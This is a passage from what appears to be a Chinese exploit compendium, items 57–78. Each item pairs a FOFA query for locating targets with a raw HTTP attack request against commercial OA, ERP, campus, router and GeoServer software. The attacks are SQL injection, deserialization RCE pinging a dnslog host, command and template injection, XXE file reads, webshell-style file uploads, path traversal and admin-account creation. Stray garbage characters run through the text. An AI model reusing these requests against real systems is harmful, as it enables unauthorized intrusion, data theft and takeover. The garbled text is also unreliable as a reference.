Host: x.x.x.x6 x$ Q, S5 {8 a2 y# }& L. B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
: ~1 T4 {! R& T, h+ k# g. ~Content-Type: application/json
# Q3 @! l! t1 N9 U- f: n9 g& Q1 E/ @% e
{
2 M4 e% O( A+ W- } "storeID":{ A) o' n y0 z% d6 x, u
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",2 l; ^+ h1 q. b) O0 h/ }/ M
"MethodName":"Start",
: P- A; ^3 N+ H "ObjectInstance":{
6 `, |6 ]: `& n- q3 [# J3 _ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ w5 U6 O. J3 W3 i6 W% _ "StartInfo": {
# ^4 t. T: W" N8 y1 U9 J "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& a0 q- d% E' V i# S, ~3 J
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
* x& K4 q4 E( y/ T }
9 N' \8 `% ?# Q! i }7 F' P/ z. W3 H) `$ T" x4 x; E- K8 j: v
}- h ]+ m2 Y/ v5 \8 K) w' O
}! V, m8 j5 k$ s M4 w e, q0 q$ a
. J7 f T# W4 f
/ K. X) s& j# u
57. 畅捷通T+ keyEdit.aspx SQL注入
# ~" S) ]: H3 d# R9 @FOFA:app="畅捷通-TPlus"
( n& R+ f) \" `: @7 aGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1: u; c! w" u/ \: c5 D, V W
Host: host
4 X8 Y8 c) P; }8 j% }7 iUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* r# t+ Z( S$ Z, TAccept-Charset: utf-8
/ v$ k$ y% g2 X( }' g' vAccept-Encoding: gzip, deflate
; l9 N0 p' g0 M5 HConnection: close8 |0 G7 i( {7 O
& C; x3 i3 Y/ E" f' l# _( R3 a
4 {7 q+ z2 q7 d6 q1 `+ e4 o58. 畅捷通T+ KeyInfoList.aspx sql注入. Z# `+ _" Y! j) t5 q" B! s
FOFA:app="畅捷通-TPlus"7 d9 a B6 ? N4 Z, ]+ y
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
+ l1 \5 F# x7 V& uHost: your-ip
6 K, q% h9 _: u7 T( |7 K1 V- z/ {User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ E; F# ~, W# ?; e5 B
Accept-Charset: utf-84 {! E# Y- G5 r7 N. f9 N
Accept-Encoding: gzip, deflate
, j/ R) U: ]% n* |! I3 }Connection: close
2 O$ W! J2 n6 }: g% d; M' I" j) g
! P# d! @" a! W1 V, X
4 C! V+ s: E0 K4 C$ [9 g59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ K/ E6 ?% `2 {' O6 C/ k( i( LFOFA: title="@XETUX" && title="XPOS" && body="BackEnd") e2 o; e8 y, s: p0 ?
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.18 x" P( L4 C: m( v- m
Host: 192.168.86.128:9090: O# T/ |6 L0 E9 @8 O
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
2 D% \( E) ~* X! h, fConnection: close, r: s5 l7 ]. _/ T( d
Content-Length: 1669
" H. x( M; |$ l8 n; X2 ~+ lAccept: */*, k/ z2 g+ E1 B# }5 Z
Accept-Language: en
) ?* W. |: `2 l% }) kContent-Type: application/x-www-form-urlencoded, K2 {) k3 X! J3 o
Accept-Encoding: gzip. z! l* b! D( U3 D
/ u( X7 D, K1 H
PAYLOAD, \' e, t/ Y7 K8 M+ U+ {
" f# T4 r% v) G' r* x% C i3 [4 ]& Y2 P- X5 x8 ^' [! K% w: P
60. 百卓Smart管理平台 importexport.php SQL注入
: |# x4 K; {5 a5 k: ~FOFA:title="Smart管理平台"
# K, i3 j+ j' w4 f+ fGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1- i! P! Y% x$ A- H( m2 X' J2 {% n5 Q
Host:8 c8 g3 t' U# R3 Y8 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# ^8 ?% e$ x* O& V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 v8 l% v/ ]" R+ v l5 e- N$ bAccept-Encoding: gzip, deflate
4 X g1 o. d' T( eAccept-Language: zh-CN,zh;q=0.9
2 I( [, b& U q; P# NConnection: close: d9 Q! d% o. G$ x4 k. N( J C6 y
E% y- }9 J0 U
6 M! {1 E# `5 z! r61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! K2 M% K1 c8 s( a. n* ~7 DFOFA: title="欢迎使用浙大恩特客户资源管理系统"
9 d, p- N7 C. A# l( tPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.14 g! _+ x3 \; D: W: m+ Z
Host: x.x.x.x
2 K. W0 P. L. I- D( @* kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 T- `8 E$ f1 W% |1 V* w
Connection: close
' I0 m/ H) J% ?4 `6 r: uContent-Length: 275 t5 B& j& p& U6 n
Accept: */*
1 V% `1 q: d- `Accept-Encoding: gzip, deflate) C5 ?% E5 i4 E- W: D4 U
Accept-Language: en7 C0 J I% v5 K3 N
Content-Type: application/x-www-form-urlencoded; e) ~, U \, Q; S7 W+ d
9 d' e/ ? d6 w: X. K) \8uxssX66eqrqtKObcVa0kid98xa* J0 p9 w/ z# X# u% E
" V" P" j9 X" u3 T6 o
& i* E/ c9 O8 A$ u: v, {2 v62. IP-guard WebServer 远程命令执行) i. Z+ ]2 X$ f& z, R8 M; p4 n: r
FOFA:"IP-guard" && icon_hash="2030860561"
1 X7 X1 f2 _3 Q! n9 C8 aGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.12 e3 p0 w4 J1 ^3 t/ ^- G
Host: x.x.x.x
. F2 n9 d+ I/ O+ B( N, K9 OUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
: j8 ?% `0 [% y. v" M4 k" F- JConnection: close3 b& }7 ~1 P) n( v7 N
Accept: */*
' D/ G2 i; H# @- _Accept-Language: en
# s" F+ n* s1 n2 f+ bAccept-Encoding: gzip4 K- G8 o0 x" m% S
& { Q$ V5 n; a# N, G5 C
" ?) B- ]7 a5 M$ l% l$ J# {访问* P) a6 J6 q5 t% M6 T
# N; M. [4 F% }GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
4 g ?0 U# z/ S+ ZHost: x.x.x.x- w5 h. T* L$ P& ?
+ a I; I+ V4 s3 ^: p) ]' N
; n5 V1 }- i- U2 B5 i3 P5 H
63. IP-guard WebServer任意文件读取) C& H) ?9 N# }% p5 x, n( q7 W+ a
IP-guard < 4.82.0609.0( p7 H l+ x" S* b/ }" ~$ f$ L
FOFA:icon_hash="2030860561"
1 V) u2 u, l X' Z0 E4 P, H3 pPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.14 A; ]. R3 i4 m0 D- ]1 A
Host: your-ip
. F2 }* U6 E* ~1 C# B- e2 R4 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( i8 y1 g( K6 }0 e" a* yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% @' x4 c# j6 u% A: b
Accept-Encoding: gzip, deflate
8 f7 x2 C! g- ?2 uAccept-Language: zh-CN,zh;q=0.9
; V8 ?3 l. H( H1 a0 `Connection: close
/ m z, j1 f+ p3 r0 UContent-Type: application/x-www-form-urlencoded6 q& h' |9 N1 p
$ X i3 m1 S! v' {3 B: L
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A4 Z' K$ V/ h# v2 I- o; _- v
. M5 V- i- q5 q6 y1 O
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
4 V6 d* e1 v1 w1 gFOFA:body="/Scripts/EnjoyMsg.js"
% L% h7 D8 J5 b, R" O9 `POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
5 d/ I5 R) C- o ]; A* EHost: 192.168.86.128:9001
( [ w$ e% E2 G- g, ^& eUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36. k- a( C( P4 p; s
Connection: close
9 D( t( E4 J* q/ uContent-Length: 369
& j' g. y3 u& tAccept: */*
6 ^0 s8 I, ^) r J' O R. eAccept-Language: en
' }( i9 V9 G. R$ h4 k+ |. P9 yContent-Type: text/xml; charset=utf-86 S8 I) l; r a- w' }
Accept-Encoding: gzip
0 w+ d8 p* A4 a6 _# u
$ z/ ~& V" k, a) ~' U& y. Z7 @1 v<?xml version="1.0" encoding="utf-8"?>
0 S' s( G" t5 V" ^2 s<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! s2 ~: c a- ~1 w/ |: S9 Z<soap:Body>) @, Y4 u6 s/ p0 g+ u
<GetOSpById xmlns="http://tempuri.org/">/ h& q! D2 S! E) O, f8 K+ y
<sId>1';waitfor delay '0:0:5'--+</sId>
$ Z- g4 i% `- C% X0 q </GetOSpById>7 ]1 G+ O2 u, c. d+ G% s2 q3 i% q6 m
</soap:Body>
- P" M1 S+ B5 h+ \, M# Z</soap:Envelope>. S3 K" l7 @5 @3 Q: ?
8 F6 ^/ Z! t; C [8 ]) J* P1 V5 d0 ?" s
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
# {9 u. ]( \4 b7 A% |4 hFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
" z2 _4 P' P/ f. e, @& q" Y响应200即成功创建账号test123456/1234566 n' p2 s% I, L1 [& P, t$ W: g3 x$ B' Q
POST /SystemMng.ashx HTTP/1.10 B% [1 z, b, k$ l' R+ z8 d
Host:1 P: Q. X$ ?/ x3 Z
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
- o) d, a: t+ ]8 Y6 NAccept-Encoding: gzip, deflate3 G2 ^/ Y& v+ n) x
Accept: */*3 p5 v) {+ _- h
Connection: close
1 d3 k( \4 n; f, B- K" p. ^; ~Accept-Language: en
' ?6 e. ^, `# g. XContent-Length: 174! E: y$ {' e0 L: [6 |+ w0 ~. A
: L1 Q9 o$ @& {9 T' d" \8 C
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators; C2 L1 d1 D- e0 x9 X5 Z8 I
( O# [' x# A4 u, {* y' ?. \) ?+ I- i# I; o4 W* c
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
- F/ D b$ O0 ~4 B' L) MFOFA:app="万户ezOFFICE协同管理平台"
7 E1 ]- }2 n | G/ f1 N! [ t
3 D9 j( F0 g, I( d! HGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
6 ?2 @, }/ ~ T" d0 `' WHost: x.x.x.x
( u/ q: Y" f# l5 ^9 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 s4 F2 r8 P1 a G
Connection: close
9 j g( D- e9 `; \4 x: V9 UAccept: */*# A- F5 O. y3 M1 \
Accept-Language: en+ P% |1 n4 N+ K- H# h8 |
Accept-Encoding: gzip
2 z2 R5 {& v3 ?/ N4 ^2 G. a
$ }9 h# |! M/ b: t
8 i2 h5 L" V$ N第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
8 Y' Z% N/ u/ U
4 s& O2 F+ a1 @ x67. 万户ezOFFICE wpsservlet任意文件上传, w. m; P6 @/ J" f& l7 N) F X
FOFA:app="万户网络-ezOFFICE"
$ g1 j/ K7 r. P; K. z4 o1 }6 `newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
" h. M6 T( N1 E, D1 JPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.19 N7 J. ~7 b- w- j" T" e' R
Host: x.x.x.x1 W' {: C5 f( c, ]7 D- P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+ ^& t, z. L# v4 f& B1 ?Content-Length: 173* m: }$ z- j! D% C7 G% _6 x; K$ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
/ s+ Q4 E) L8 W' ^6 e- n' X6 o! `Accept-Encoding: gzip, deflate
: _2 e& U5 R% s$ G, j% }. o9 EAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+ R1 M2 ]. Y- c0 QConnection: close
; `0 x3 S8 b9 IContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp6 a3 l/ L- y/ @ d
DNT: 1# D {! i) ?( w! O3 P
Upgrade-Insecure-Requests: 1
6 g: j' ^8 }' }2 e2 {# h
& s) {* y* c( O: u--ufuadpxathqvxfqnuyuqaozvseiueerp
: q0 \% H+ M. x( K D. fContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
0 ~0 w8 k/ Y" G7 M
* ^1 b, `' x/ L4 p6 w M) ~; b: a( H* c( m<% out.print("sasdfghjkj");%>
G- `- G2 L# A--ufuadpxathqvxfqnuyuqaozvseiueerp--! v) {. n5 ]5 n9 e
3 r6 }) M, X4 b& ?+ J V# S% ~4 @
+ v4 n3 c5 I$ U% b' L& Z文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
0 `7 R+ E; N$ d% D( ~# I! P$ I* C. O( W! D o' J- e$ }1 }3 _
68. 万户ezOFFICE wf_printnum.jsp SQL注入
* L8 I( x! V- G# V7 nFOFA:app="万户ezOFFICE协同管理平台"
+ M% _- Q% p4 r5 E6 b( q# D) t7 BGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1* k( h6 I7 C; i& H5 F" M& G
Host: {{host}}
5 r+ z9 a4 F5 m& ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36* F0 M G4 s8 j `& m8 D' \; h1 ?
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
5 x* u' Q) H/ r( Q5 d Z3 P3 hAccept-Encoding: gzip, deflate
* q8 P! i) b, {9 \3 g5 |8 s' w9 yAccept-Language: zh-CN,zh;q=0.93 _0 J+ W2 m8 M
Connection: close
6 Y" _1 ?5 ^6 u3 u6 W& Q7 i+ a
: o1 @0 a+ R1 C# l) C$ T5 S6 l( ?% A! x8 |$ u
69. 万户 ezOFFICE contract_gd.jsp SQL注入& U+ Y; ^$ P4 ^3 k0 y- s
FOFA:app="万户ezOFFICE协同管理平台"
% x, R5 L% Y# V& u; y1 ?( dGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1; a" D3 q* L8 B% C
Host: your-ip2 [: n1 Q9 e0 v$ H
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
# V3 i; X% G9 } K5 UAccept-Encoding: gzip, deflate! Q' D" M" f4 Q6 }+ |
Accept: */*! N' Q0 E7 o. C! G3 a# I! D
Connection: keep-alive4 h2 l+ v, z, F
+ R0 A B2 _, l7 R( o8 {8 x9 c( L
0 }( ?$ T4 R0 ?) i5 n70. 万户ezEIP success 命令执行
6 ?* G( [: m! d+ f L- L3 T6 f$ `FOFA:app="万户网络-ezEIP" o& I: `4 F0 f! Q
POST /member/success.aspx HTTP/1.1) P& s5 Z( d3 S/ q8 d
Host: {{Hostname}}
; S) v# m& z6 ?& kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: h! u: V2 L' g, b) Z- |( r
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
* M, H7 ~' c! F' F- ^! s: cContent-Type: application/x-www-form-urlencoded3 E' I3 J, [- v" a( s, ? x% @
TYPE: C
- o: @/ ?' W; p4 _0 s6 C9 l s+ J3 yContent-Length: 16702
; v1 n8 d# \7 i$ D8 q+ n- `8 D
- A* J1 l3 S0 C$ S2 x$ `1 F7 o. X__VIEWSTATE=PAYLOAD4 B" Q ]6 V/ ~4 i! k* U# E
# y: z* ] W$ ], y" T2 T
3 _$ F u! f7 I( `) r9 Y71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入5 W% k/ Q# }8 f: K' V0 e, W
FOFA:body="PM2项目管理系统BS版增强工具.zip"& v. Y+ Q, G) L( R9 s6 d
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
+ H( F0 Q( E9 @% {% MHost: x.x.x.xx.x.x.x& i; Z$ n- R8 a; x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: b$ f8 i) a, r/ WConnection: close' D& a1 {" u3 x9 Y e {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# P: W# f3 X, A# d3 TAccept-Encoding: gzip, deflate7 B/ G- ~4 r" r% b% w7 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- c# o* b! K3 k! F8 U+ @Upgrade-Insecure-Requests: 1
, Y) \ ^2 J- X
; z2 ~( _' G7 V7 D6 I. z) y6 S( M
72. 致远OA getAjaxDataServlet XXE2 J' V8 V5 j7 y# e7 X0 G
FOFA:app="致远互联-OA"- T) s+ _) B @) N1 u/ ^
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.11 G8 ~# V, \6 Y' e' f/ W
Host: 192.168.40.131:8099" H! [: p8 r5 d- w
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
j4 c t9 J5 G) p+ p5 dConnection: close- _( _9 B% e4 i3 O
Content-Length: 583( A+ q y! e" l4 \
Content-Type: application/x-www-form-urlencoded
8 U$ H. A+ Q1 b7 z, _. O0 I pAccept-Encoding: gzip3 d X* ^9 n8 W
( C% c+ g' ~% M0 rS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E. D! W# W1 L, @/ g$ R* H1 O8 p
/ U4 g7 @) C* @* Y! L& l
4 C) ?8 x! i" n* ?73. GeoServer wms远程代码执行
+ v& S! X1 _3 cFOFA:icon_hash=”97540678”
( L0 {( B) v, E3 t6 QPOST /geoserver/wms HTTP/1.1& [8 w0 i: g+ ]0 B% m
Host:$ t% a; }+ \* f( n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ I& m% n& Y* `; R. p5 FContent-Length: 1981
4 H5 b% Y3 C L4 ^Accept-Encoding: gzip, deflate, F8 N* S5 E! j! o1 m$ z# X! K
Connection: close- k' r' v( i$ I" \9 ]1 q& B
Content-Type: application/xml$ A' D2 [) M1 }7 Y
SL-CE-SUID: 3
5 w& h: e8 v' g% H; T& d+ \, s- {2 a
PAYLOAD
( y1 k7 s; ]" T% K0 O3 X% D/ X; E) H- Q, d3 I# ^/ X# H$ E. V2 X, u
) ?; `9 }6 j) }; x/ Z: O6 R74. 致远M3-server 6_1sp1 反序列化RCE# i$ s) Z6 o5 u4 T. p+ C6 c+ W/ @
FOFA:title="M3-Server"7 {6 v9 y1 t, J0 D
PAYLOAD t2 Z0 m$ L7 n A
: ^3 P! X* x D1 p$ m5 L75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' o; u" n( ^- @- kFOFA:app="TELESQUARE-TLR-2005KSH"+ \' g& Z( S4 V. `4 e, W; c) \
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
& t5 {8 _2 @, YHost: x.x.x.x
$ z" H* h! I% f6 B: aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; z7 h/ X4 U3 R. @Connection: close+ B7 ^& i3 Q4 d# e2 z! h
Accept: */*
1 A. r p" M7 Q! o" w# zAccept-Language: en- x/ l/ C B, o6 h. O+ v
Accept-Encoding: gzip
7 l+ G S+ O ^; n- \, a. p! M. X {9 `! i0 w
$ P! }. T- P) P+ @: tGET /cgi-bin/test28256.txt HTTP/1.17 ]4 ~6 e2 @# R
Host: x.x.x.x3 L+ N* {: }$ w) t
% r6 u' j! P# k! `: @
9 k2 l2 F( L! }, g, g76. 新开普掌上校园服务管理平台service.action远程命令执行
, h4 s5 y; P2 E6 R* q# ^FOFA:title="掌上校园服务管理平台"$ [' S* t, u8 X( n% W0 U8 h( |
POST /service_transport/service.action HTTP/1.14 c r& M9 L" W" x# Z1 p: T
Host: x.x.x.x/ i" M0 U, w; l0 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
$ O _! x: n7 L pConnection: close [/ E p- b8 d& p Y
Content-Length: 211. p0 e1 w0 F( M* `* J" k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- P( Q/ i0 X; {# \. r, c: ?
Accept-Encoding: gzip, deflate
/ Z- q& [" W# k5 n5 }# K# l( fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 i. l) i1 D& ?8 M# e7 I- MCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
2 F, L- w- N4 ?0 o; ]1 jUpgrade-Insecure-Requests: 1
3 y* q( |. M4 t1 |1 ?/ C
& f# ?: a# e- Q0 V0 x{8 `( D C: O* D! Q
"command": "GetFZinfo",& x1 A- m5 s, m( y% u
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"6 E% O. a: @4 V, P9 Z
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
$ S% a2 _! C% }3 n+ L. l( p- M, U) D}: _) Z3 Z2 W/ u! F7 r* o
' w& c9 Y# q ^2 Y( S* F
" G6 Q; l# i3 z. e$ V" mGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
' n7 F+ n7 A* J) T! YHost: x.x.x.x
6 U1 W) L0 a/ d9 U: f: f
1 b( d! K8 M# c A% U4 \! B& q, t) x7 t6 S
: N) U8 f7 ? b+ O77. F22服装管理软件系统UploadHandler.ashx任意文件上传
1 }9 S( A- x8 d2 ]/ ^FOFA:body="F22WEB登陆"
( G* x0 O' k1 {9 a6 aPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
/ E2 a6 J' q0 S3 X2 |9 v! jHost: x.x.x.x
! h3 k& k+ Y0 |6 {6 n2 R4 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' x9 G3 G: g. h: B5 h, X% ?
Connection: close
/ v6 R% ]6 u, L7 G7 _5 X% oContent-Length: 433
, W5 {3 S, ]. ?3 R3 ~+ dAccept: */*2 R$ `) ?9 V2 v e. N
Accept-Encoding: gzip, deflate
. E2 a3 i0 X2 n% u3 O; Q) gAccept-Language: zh-CN,zh;q=0.95 }3 b/ Z: q4 i- U0 a4 R
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix! m7 e8 h# b1 p5 B
$ I# T& I4 f# H6 ~2 Z( a; X2 D------------398jnjVTTlDVXHlE7yYnfwBoix5 _% R, F9 Z% a) o
Content-Disposition: form-data; name="folder"' ?; c% s( b/ m; x0 e( X$ y
0 d% G! J1 j3 r, V N9 d/upload/udplog
' \. x; F4 @2 _6 }------------398jnjVTTlDVXHlE7yYnfwBoix7 V0 q6 ^6 Z2 ?) b; T, \9 U- q, k4 n
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"/ t; ^$ D0 q5 A& `
Content-Type: application/octet-stream
1 b: A. D0 w" t; b! E4 v0 R# R, J# q. F6 s
hello1234567$ l+ {4 w) @, A
------------398jnjVTTlDVXHlE7yYnfwBoix
# w4 z6 `' u8 l2 a* `7 J9 lContent-Disposition: form-data; name="Upload"0 ]- g/ o" X+ ^
( `: L$ l- s/ W; c& r0 l! i! u. d2 k/ ~
Submit Query
: H' p9 z k# E) {( Z# @' a------------398jnjVTTlDVXHlE7yYnfwBoix--
7 j: O, e+ e* d+ ]$ }
! j. }# Z) L, f2 h8 d/ T; d2 n1 e# C6 Z8 n
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
0 Q& R2 W0 e* ]% W! \* w. U8 {& jFOFA:icon_hash="2001627082"; T" o7 E6 b9 u8 x3 `- W, B
POST /Platform/System/FileUpload.ashx HTTP/1.1
" ^9 [0 C d H. jHost: x.x.x.x9 g! Z! p" P. s; z) R4 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, }6 o3 n, h# TConnection: close
7 H% o" |( B; B; l9 y+ ZContent-Length: 336
0 i5 j. d3 h$ W7 eAccept-Encoding: gzip
2 M' k0 G& W) E% uContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
6 ^ V$ A* \: h) D" G8 U
/ p, b* V# r9 M------YsOxWxSvj1KyZow1PTsh98fdu6l
3 b1 M" s! y+ wContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"/ V k9 X8 a J: o2 [- ^. ?
Content-Type: image/png5 u& B* V+ T; V
% g, t& P. n5 t
YsOxWxSvj1KyZow1PTsh98fdu6l
' F/ \ Y+ w# r. m' q------YsOxWxSvj1KyZow1PTsh98fdu6l
7 h5 b9 s2 N% ?7 WContent-Disposition: form-data; name="target"
6 K9 E( J* J6 I+ q# {6 X: |5 j
, b Y8 h6 l- w, s) o% Y' y7 k; i/Applications/SkillDevelopAndEHS/; g+ _- e# C. T) `9 C
------YsOxWxSvj1KyZow1PTsh98fdu6l--
- K5 o% `" G; r- s- V: z' \
